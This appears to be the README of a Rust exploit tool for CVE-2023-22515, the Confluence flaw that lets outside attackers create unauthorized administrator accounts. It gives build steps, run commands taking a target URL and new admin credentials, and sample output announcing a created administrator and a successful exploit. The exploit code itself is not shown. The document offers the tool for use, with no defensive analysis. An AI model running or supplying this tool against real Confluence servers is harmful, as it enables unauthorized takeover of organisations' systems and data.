# CVE-2023-22515

<p align="left">
	<a href=""><img src=""></a>
	<a href="#"><img src=""></a>

- [Overview](#overview)
- [Compile](#compile)
- [Usage](#usage)
- [Running CVE-2023-22515](#running-cve-2023-22515)

# Overview

Confluence is a web-based enterprise wiki developed by Australian software company Atlassian.
Atlassian has been made aware of an issue reported by some customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence server and data center instances to create unauthorized Confluence administrator accounts and access Confluence instances.

The vulnerability has been classified as ```CVE-2023-22515```

# Compile

First perform the compilation with the command:

cargo build --release

# Usage

You can do it in these two ways:
cargo run -- --target http://localhost --username "teste" --password "teste" 

.\target\release\cve_2023_22515 --target http://localhost --username "teste" --password "teste" 

This will display help for the tool. Here are all the switches it supports:


Usage: CVE_2023_22515 --target <TARGET> --username <USERNAME> --password <PASSWORD>

  -t, --target <TARGET>      Insert target
  -u, --username <USERNAME>  Insert username
  -p, --password <PASSWORD>  Insert password
  -h, --help                 Print help

# Running CVE-2023-22515

cargo run -- --target --username "teste" --password "teste" 

[!] Request for:
[!] Creating Administrator account
[!] Checking the answer
[+] Username created successfully: teste
[+] Password created successfully: teste
[+] Exploit ending successfully!!